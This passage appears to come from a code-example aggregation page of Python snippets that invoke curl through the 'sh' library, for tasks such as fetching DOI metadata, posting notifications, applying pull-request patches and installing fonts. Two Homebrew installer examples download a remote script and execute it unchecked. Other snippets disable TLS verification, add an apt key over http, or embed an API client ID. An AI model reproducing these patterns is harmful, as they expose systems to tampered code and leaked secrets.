            try:
                # Check the "code" field for a git url (clone it into the workdir) or a script (create a file into the workdir)
                # URL: use git clone
                git.clone('--recursive', nmpi_job['code'],
                          job_desc.working_directory)
                logger.info("Cloned repository {}".format(nmpi_job['code']))
            except (sh.ErrorReturnCode_128, sh.ErrorReturnCode):
                # SCRIPT: create file (in the current directory)
                logger.info("The code field appears to be a script.")
                self._create_working_directory(job_desc.working_directory)
                with codecs.open(job_desc.arguments[0], 'w',
                                 encoding='utf8') as job_main_script:
                    job_main_script.write(nmpi_job['code'])
Example #38
def get_n_save_protprot_page_source(pdb_code):
    '''
    Takes a PDB code identifier, gets the Prot-prot page from PDBsum for that
    structure, and saves the html as a text file.

    Returns the file name of the text file produced.

    For example, from
    http://www.ebi.ac.uk/thornton-srv/databases/cgi-bin/pdbsum/GetPage.pl?pdbcode=6kiv&template=interfaces.html ,
    which is the 'Prot-prot' page for 6kiv, it will get the source html and
    save it.
    '''
    from sh import curl
    main_url = (
        "http://www.ebi.ac.uk/thornton-srv/databases/cgi-bin/pdbsum/GetPage.pl"
    )
    curl("-L", "-o", "{}".format(output_file_name), "--data",
         "pdbcode={}&template=interfaces.html".format(pdb_code),
         "{}".format(main_url))
    return output_file_name
Example #39
def add_reverbrain_repos():
    # there is no docker plugin package in trusty repos, hmm...
    # ok, let's try trusty. hope that docker plugin is integrated into libcocaine-core2
    repos = """\
    deb http://repo.reverbrain.com/trusty/ current/amd64/
    deb http://repo.reverbrain.com/trusty/ current/all/
    """
    with open("/etc/apt/sources.list.d/reverbrain.list", "a") as f:
        f.write(repos)
    sh.apt_key(sh.curl("http://repo.reverbrain.com/REVERBRAIN.GPG"), "add", "-")
    sh.apt_get("-y", "update")
Example #40
def do_review(data):
    pr = get_pullreq(data['pull_request']['base']['repo']['name'], data['pull_request']['number'])
    logger_handler.setFormatter(logging.Formatter("%%(asctime)s %s PR#%s %%(message)s" % (pr.base.repo.name, pr.number)))
    name = gerrit_name_for(pr.base.repo.name)
    ensure_repo(name)
    gh_name = pr.base.repo.name
    path = path_for_name(name)
    sh.cd(path)
    sh.git.reset('--hard')
    sh.git.checkout('master')
    if 'tmp' in sh.git.branch():
        sh.git.branch('-D', 'tmp')
    sh.git.checkout(pr.base.sha, '-b', 'tmp')
    logger.info('Attempting to download & apply patch on top of SHA %s' % pr.base.sha)
    sh.git.am(sh.curl(pr.patch_url))
    logger.info('Patch applied successfully')

    # Author of last patch is going to be the author of the commit on Gerrit. Hmpf
    author = sh.git('--no-pager', 'log', '--no-color', '-n', '1', '--format="%an <%ae>"')

    sh.git.checkout('master')

    branch_name = 'github/pr/%s' % pr.number

    is_new = True
    change_id = None

    if branch_name in sh.git.branch():
        is_new = False
        sh.git.checkout(branch_name)
        change_id = get_last_change_id()
        sh.git.checkout("master")
        sh.git.branch('-D', branch_name)
        logger.info('Patchset with Id %s already exists', change_id)
    else:
        is_new = True
        logger.info('Patchset not found, creating new')

    logger.info('Attempting to Squash Changes on top of %s in %s', pr.base.sha, branch_name)
    sh.git.checkout(pr.base.sha, '-b', branch_name)
    sh.git.merge('--squash', 'tmp')
    sh.git.commit('--author', author, '-m', format_commit_msg(pr, change_id=change_id))
    logger.info('Changes squashed successfully')
    if is_new:
        change_id = get_last_change_id()
        logger.info('New Change-Id is %s', change_id)
    logger.info('Attempting to push refs for review')
    sh.git.push('gerrit', 'HEAD:refs/for/master') # FIXME: Push for non master too!
    logger.info('Pushed refs for review')
    sh.git.checkout('master') # Set branch back to master when we're done
    if is_new:
        gh.repos(OWNER, gh_name).issues(pr.number).comments.post(body='Submitted to Gerrit: %s' % gerrit_url_for(change_id))
        logger.info('Left comment on Pull Request')
Example #41
def curl(src, dest):
    """ Installs `src` to path `dest` """
    spinner = Halo(
        text="curl {}".format(dest),
        spinner="dots",
        placement="right"
    )
    spinner.start()
    if os.path.exists(dest):
        spinner.info("{} already exists".format(dest))
        return

    try:
        sh.curl("-fLo", dest, src)
        spinner.succeed()
    except sh.ErrorReturnCode as err:
        err_message = "\n\t" + err.stderr.replace("\n", "\n\t")
        logging.error(
            "Error downloading file `%s`: %s", src, err_message
        )
        spinner.fail()
Example #42
def send(host, room_id, token, message, message_format, trigger_status,
         trigger_severity, notify=True):

    print(curl(
        URL.format(host=host, room_id=room_id, token=token),
        d=json.dumps({
            'message': message,
            'message_format': message_format,
            'notify': notify,
            'color': color(trigger_status, trigger_severity)
        }),
        H='Content-type: application/json'
    ))
Example #43
def do_review(pr):
    name = gerrit_name_for(pr.base.repo.name)
    ensure_repo(name)
    gh_name = pr.base.repo.name
    path = path_for_name(name)
    sh.cd(path)
    sh.git.reset('--hard')
    sh.git.checkout('master')
    if 'tmp' in sh.git.branch():
        sh.git.branch('-D', 'tmp')
    sh.git.checkout(pr.base.sha, '-b', 'tmp')
    logging.info('Attempting to download & apply patch on top of SHA %s' % pr.base.sha)
    sh.git.am(sh.curl(pr.patch_url))
    logging.info('Patch applied successfully')

    # Author of last patch is going to be the author of the commit on Gerrit. Hmpf
    author = sh.git('--no-pager', 'log', '--no-color', '-n', '1', '--format="%an <%ae>"')

    sh.git.checkout('master')

    branch_name = 'github/pr/%s' % pr.number

    is_new = True
    change_id = None

    if branch_name in sh.git.branch():
        is_new = False
        sh.git.checkout(branch_name)
        change_id = get_last_change_id()
        sh.git.checkout("master")
        sh.git.branch('-D', branch_name)
        logging.info('Patchset with Id %s already exists', change_id)
    else:
        is_new = True
        logging.info('Patchset not found, creating new')

    logging.info('Attempting to Squash Changes on top of %s in %s', pr.base.sha, branch_name)
    sh.git.checkout(pr.base.sha, '-b', branch_name)
    sh.git.merge('--squash', 'tmp')
    sh.git.commit('--author', author, '-m', format_commit_msg(pr, change_id=change_id))
    logging.info('Changes squashed successfully')
    if is_new:
        change_id = get_last_change_id()
        logging.info('New Change-Id is %s', change_id)
    logging.info('Attempting git review')
    sh.git.review('-t', branch_name)
    logging.info('git review successful')
    sh.git.checkout('master') # Set branch back to master when we're done
    if is_new:
        gh.repos(OWNER, gh_name).issues(pr.number).comments.post(body='Submitted to Gerrit: %s' % gerrit_url_for(change_id))
        logging.info('Left comment on Pull Request')
Example #44
    def download_client_config(self, cluster, service):
        """Download the client configuration zip for a particular cluster and service.

        Since cm_api does not provide a way to download the archive, we build
        the URL manually and download the file. Once the file is downloaded,
        the archive is extracted and its contents are copied to the Hadoop
        configuration directories defined by Impala.
        """
        logger.info("Downloading client configuration for {0}".format(service.name))
        url = "http://{0}:7180/api/{1}/clusters/{2}/services/{3}/clientConfig".format(
            self.cm_host, CM_API_VERSION, urlquote(cluster.name), urlquote(service.name))
        path = mkdtemp()
        sh.curl(url, o=os.path.join(path, "clientConfig.zip"), _out=tee, _err=tee)
        current = os.getcwd()
        os.chdir(path)
        sh.unzip("clientConfig.zip")
        for root, _, file_names in os.walk("."):
            for filename in fnmatch.filter(file_names, "*.xml"):
                src = os.path.join(root, filename)
                dst = os.path.join(self.impala_home, "fe", "src", "test", "resources")
                logger.debug("Copying {0} to {1}".format(src, dst))
                shutil.copy(src, dst)
        os.chdir(current)
Example #45
def font(name):
    """ Installs fonts using curl.

    Args:
        name (str): The name of the font as defined in `font_library` dictionary.
    """
    spinner = Halo(
        text="Font {}".format(name),
        spinner="dots",
        placement="right"
    )
    spinner.start()
    try:
        library = os.path.join(HOME, "Library/Fonts")
        path = os.path.join(library, name)
        sh.curl("-fLo", path, font_library[name])
        spinner.succeed()
    except sh.ErrorReturnCode as err:
        err_message = "\n\t" + err.stderr.replace("\n", "\n\t")
        logging.error(
            "Error installing font `%s`: %s", name, err_message
        )
        spinner.fail()
Example #46
    def get_token(self):
        """returns the authentikation token from keystone with a curl call"""
        param = '{"auth":{"passwordCredentials":{"username": "******", "password":"******"}, "tenantName":"%(OS_TENANT_NAME)s"}}' % (self.credential)
        
        response = curl(
            "--cacert", self.credential['OS_CACERT'],
            "-k",
            "-X",
            "POST", "%s/tokens" % self.credential['OS_AUTH_URL'],
            "-d", param,
            "-H", 'Content-type: application/json'
            )

        result = json.loads(str(response))
        return result
Example #47
def upload():
    try:
        resp = curl(
            "https://api.imgur.com/3/image",
            H="Authorization: Client-ID ca77119dcc8c6d8",  # Get your client ID from imgur.com
            X="POST",
            F='image=@%s' % sys.argv[1])
        objresp = json.loads(resp.stdout)

        if objresp.get('success', False):
            return objresp['data']['link']
        else:
            return 'Error: ', objresp['data']['error']
    except Exception as e:
        print 'Error: ', e
Example #48
    def _get_code(self, nmpi_job, job_desc):
        """
        Obtain the code and place it in the working directory.

        If the experiment description is the URL of a Git repository, try to clone it.
        If it is the URL of a zip or .tar.gz archive, download and unpack it.
        Otherwise, the content of "code" is the code: write it to a file.
        """
        url_candidate = urlparse(nmpi_job['code'])
        logger.debug("Get code: %s %s", url_candidate.netloc, url_candidate.path)
        if url_candidate.scheme and url_candidate.path.endswith((".tar.gz", ".zip", ".tgz")):
            self._create_working_directory(job_desc.working_directory)
            target = os.path.join(job_desc.working_directory, os.path.basename(url_candidate.path))
            #urlretrieve(nmpi_job['code'], target) # not working via KIP https proxy
            curl(nmpi_job['code'], '-o', target)
            logger.info("Retrieved file from {} to local target {}".format(nmpi_job['code'], target))
            if url_candidate.path.endswith((".tar.gz", ".tgz")):
                tar("xzf", target, directory=job_desc.working_directory)
            elif url_candidate.path.endswith(".zip"):
                try:
                    # -o for auto-overwrite
                    unzip('-o', target, d=job_desc.working_directory)
                except:
                    logger.error("Could not unzip file {}".format(target))
        else:
            try:
                # Check the "code" field for a git url (clone it into the workdir) or a script (create a file into the workdir)
                # URL: use git clone
                git.clone('--recursive', nmpi_job['code'], job_desc.working_directory)
                logger.info("Cloned repository {}".format(nmpi_job['code']))
            except (sh.ErrorReturnCode_128, sh.ErrorReturnCode):
                # SCRIPT: create file (in the current directory)
                logger.info("The code field appears to be a script.")
                self._create_working_directory(job_desc.working_directory)
                with codecs.open(job_desc.arguments[0], 'w', encoding='utf8') as job_main_script:
                    job_main_script.write(nmpi_job['code'])
Example #49
def update_entry_from_doi(entry):
    """Refill entry fields using its DOI."""
    if 'doi' not in entry:
        return entry
    ans = sh.curl('-LH', r'Accept: text/bibliography; style=bibtex',
                  r'http://dx.doi.org/' + entry['doi']).stdout
    ans = ans.decode('UTF-8')
    accepted_fields = ['title', 'volume', 'year', 'number', 'journal',
                       'publisher', 'month']
    new_fields = {}
    for field in accepted_fields:
        value = re.search(field + r'={([^}]*)}', ans)
        if value:
            new_fields[field] = value[1]
    entry.update(new_fields)
    return entry
Example #50
def pull_info_from_doi(doi, accepted_fields=None):
    """Pull down paper info using its DOI identifier."""
    ans = sh.curl('-LH', r'Accept: text/bibliography; style=bibtex',
                  r'http://dx.doi.org/' + doi)
    ans = ans.stdout.decode('UTF-8')
    if accepted_fields is None:
        accepted_fields = [
            'title', 'year', 'volume', 'number', 'pages', 'ISBN', 'journal',
            'publisher', 'month', 'author', 'doi'
        ]
    details = {}
    for field in accepted_fields:
        value = re.search(field + r'={([^}]*)}', ans)
        if value:
            details[field] = value[1]
    details['doi'] = doi
    return details
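
A hedged usage sketch for pull_info_from_doi above; the DOI is a placeholder. dx.doi.org content-negotiates a BibTeX record because of the Accept header, and the regex then extracts the requested fields:

# info = pull_info_from_doi('10.1234/example.doi',
#                           accepted_fields=['title', 'year', 'author'])
# print(info['doi'], info.get('title'))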
Example #51
def install_homebrew():
    """ Installs or upgrades homebrew on mac.

    If homebrew is not installed, this command will install it, otherwise
    it will update homebrew to the latest version. Additionally, it will
    offer to upgrade all homebrew packages. Upgrading all packages can take
    a long time, so the user is given the choice to skip the upgrade.
    """
    print("Checking homebrew install")
    if sh.which("brew"):
        spinner = Halo(
            text="Updating homebrew", spinner="dots", placement="right"
        )
        spinner.start()
        sh.brew("update")
        spinner.succeed()
        print(
            "Before using homebrew to install packages, we can upgrade "
            "any outdated packages."
        )
        response = user_input("Run brew upgrade? [y|N] ")
        if response[0].lower() == "y":
            spinner = Halo(
                text="Upgrade brew packages", spinner="dots", placement="right"
            )
            spinner.start()
            sh.brew("upgrade")
            spinner.succeed()
        else:
            print("Skipped brew package upgrades")
    else:
        # TODO (phillip): Currently, this homebrew installation does not work on a fresh
        # computer. It works from the command line, but not when run from the script. I
        # need to figure out what is going on. It could be because user input is needed.
        spinner = Halo(
            text="Installing homebrew", spinner="dots", placement="right"
        )
        spinner.start()
        try:
            script = sh.curl("-fsSL", BREW_GITHUB).stdout
            sh.ruby("-e", script)
            spinner.succeed()
        except sh.ErrorReturnCode:
            logging.error("Unable to install homebrew. Aborting...")
            spinner.fail()
            exit(1)
Example #52
def install_homebrew():
    """ Installs or upgrades homebrew on mac.

    If homebrew is not installed, this command will install it, otherwise
    it will update homebrew to the latest version. Additionally, it will
    offer to upgrade all homebrew packages. Upgrading all packages can take
    a long time, so the user is given the choice to skip the upgrade.
    """
    print("Checking homebrew install")
    if sh.which("brew"):
        spinner = Halo(text="Updating homebrew",
                       spinner="dots",
                       placement="right")
        spinner.start()
        sh.brew("update")
        spinner.succeed()
        print("Before using homebrew to install packages, we can upgrade "
              "any outdated packages.")
        response = user_input("Run brew upgrade? [y|N] ")
        if response[0].lower() == "y":
            spinner = Halo(text="Upgrade brew packages",
                           spinner="dots",
                           placement="right")
            spinner.start()
            sh.brew("upgrade")
            spinner.succeed()
        else:
            print("Skipped brew package upgrades")
    else:
        # TODO (phillip): Currently, this homebrew installation does not work on a fresh
        # computer. It works from the command line, but not when run from the script. I
        # need to figure out what is going on. It could be because user input is needed.
        spinner = Halo(text="Installing homebrew",
                       spinner="dots",
                       placement="right")
        spinner.start()
        try:
            script = sh.curl("-fsSL", BREW_GITHUB).stdout
            sh.ruby("-e", script)
            spinner.succeed()
        except sh.ErrorReturnCode:
            logging.error("Unable to install homebrew. Aborting...")
            spinner.fail()
            exit(1)
Example #53
def package(ctx, path, version):
    '''
    Package a current path to a new version and upload to chart repo.
    '''
    # helm package --app-version 0.1.9 --version 0.1.9 fantuan-base
    # curl -F "[email protected]" http://localhost:8080/api/charts

    update_helm()

    path = path.strip('/')

    chart_name = path.split('/')[-1]
    if not version:
        click.echo(
            click.style('No version specified. Reading from chart_repo ...',
                        fg='yellow'))
        version = Version(
            get_chart_version(ctx.obj.get('helm_repo'), chart_name))
        version = str(version.next_patch())
        click.echo(click.style('Get new version %s' % version, fg='green'))
    Version(version)

    click.echo(click.style('Updating dependency ...', fg='yellow'))
    helm.dependency.update(path)
    click.echo(click.style('Done!\n', fg='green'))

    click.echo(click.style('Packaging ...', fg='yellow'))
    helm.package('--app-version', version, '--version', version, path)
    tar = '%s-%s.tgz' % (path, version)

    click.echo(click.style('Uploading ...', fg='yellow'))
    cmd_result = curl('-F', 'chart=@%s' % tar,
                      get_chart_repo(ctx.obj.get('helm_repo')) + '/api/charts')

    click.echo(click.style('Cleaning ...', fg='yellow'))
    rm(tar)

    result = json.loads(cmd_result.stdout)
    if result.get('saved'):
        click.echo(click.style('SUCCESS!', fg='green'))
    else:
        click.echo(click.style('FAILED!: %s' % result.get('error'), fg='red'))
Example #54
def run_docker_dev_test(path, coverage=False):
    """
    Method to check that docker runs with dev.yml
    """
    try:
        # build django, power up the stack and run the test
        sh.docker_compose("--file", "{}/dev.yml".format(path), "build",
                          "django")
        sh.docker_compose("--file", "{}/dev.yml".format(path), "build")
        if coverage:
            sh.docker_compose("--file", "{}/dev.yml".format(path), "run",
                              "django", "coverage", "run", "manage.py", "test")
            sh.docker_compose("--file", "{}/dev.yml".format(path), "run",
                              "django", "coverage", "xml", "-o",
                              "coverage.xml")
            shutil.copyfile(os.path.join(str(path), ".coverage"),
                            os.path.join(PROJECT_DIR, ".coverage"))
            shutil.copyfile(os.path.join(str(path), "coverage.xml"),
                            os.path.join(PROJECT_DIR, "coverage.xml"))
        else:
            sh.docker_compose("--file", "{}/dev.yml".format(path), "run",
                              "django", "python", "manage.py", "test")

        # test that the development server is running
        sh.docker_compose("--file", "{}/dev.yml".format(path), "up", "-d")
        time.sleep(10)
        curl = sh.curl("-I", "http://localhost:8000/")
        assert "200 OK" in curl
        assert "Server: Werkzeug" in curl

        # since we are running a lot of tests with different configurations,
        # we need to clean up the environment. Stop all running containers,
        # remove them and remove the postgres_data volume.
        sh.docker_compose("--file", "{}/dev.yml".format(path), "stop")
        sh.docker_compose("--file", "{}/dev.yml".format(path), "rm", "-f")
        sh.docker("volume", "rm",
                  "cookiecuttersaastestproject_postgres_data_dev")
    except sh.ErrorReturnCode as e:
        # in case there are errors it's good to have full output of
        # stdout and stderr.
        pytest.fail("STDOUT: {} \n\n\n STDERR: {}".format(
            e.stdout.decode("utf-8"), e.stderr.decode("utf-8")))
Example #55
def get_file_names(url=GNU_URL):
    html_file = str(sh.curl(url, silent=True))
    parsed_html = BeautifulSoup(html_file, 'html.parser')
    links = parsed_html.body.find_all('a', href=True, text='download')
    all_routes = []
    sig_routes = []
    tar_routes = []
    for a in links:
        strg = str(a)
        if strg.find('tar.bz2') > 1 or strg.find('tar.bz2.sig') > 1:
            for rec in REQD_PKG_NAMES:
                if strg.find(rec) > 1:
                    all_routes.append(a['href'])
    for rt in all_routes:
        if rt.endswith('.bz2'):
            tar_routes.append(rt)
        elif rt.endswith('.sig'):
            sig_routes.append(rt)
    # print 'Sigs' + str(sig_routes) + '\r\n'
    # print 'Tar' + str(tar_routes) + '\r\n'
    REQD_FTP_ROUTES = sig_routes + tar_routes
    return all_routes, tar_routes, sig_routes
Example #56
def download_data(output_folder, tiles=None, years=None, months=None,
                  live=True):
    for time_period in get_time_periods():
        (year, month) = parse_time_period(time_period)
        if not (months is None or month in months):
            continue  # not a month we care about
        if not (years is None or year in years):
            continue  # not a year we care about
        for tile_file in get_tile_files(time_period):
            tile = parse_tile_filename(tile_file)
            if not (tiles is None or tile in tiles):
                continue  # not a tile we care about
            url = '%s/%s/vcmcfg/%s' % (BASE_URL, time_period, tile_file)
            if live:
                # 'Warning: files to be downloaded are large'
                sh.tar(
                    sh.curl(url, _piped=True),
                    "xzv",
                    _cwd=output_folder
                )
            else:
                print 'Would download %s' % url
    if not live:
        print """
Example #57
        "attachments" : [
          {
            "color":"good",
            "fields":[
              {
                "title":"new value",
                "value":message,
                "short":False
                }
              ]
            }
          ]
        }
      payload = "payload=" + json.dumps(payload)
      sh.mv(new_file, old_file)
      sh.curl("-X", "POST", "--data-urlencode", payload, script_metadata["slack_url"])
  except Exception as e:
    print "failed on " + script +" :" + str(e) 

if len(sys.argv) > 1 and sys.argv[1] == "example":
    print("initialising example")
    if not isdir(script_dir):
      mkdir(script_dir)
    script = open(join(script_dir,"example.sh"),'w')
    script.write("#!/bin/bash\necho 'hi'")
    metafile = open(join(script_dir,"example.json"),'w')
    meta = {
      "channel":"#example",
      "user":"******",
      "title":"script title",
      "emoji":":metal:",
Example #58
def send(data, path):
    msg = json.dumps(data)
    log("Sending: \'{}\' to {}\n", msg, path)
    curl("-i", "-H", 'Content-Type: application/json', "-d", msg, "127.0.0.1:9001/%s" % path)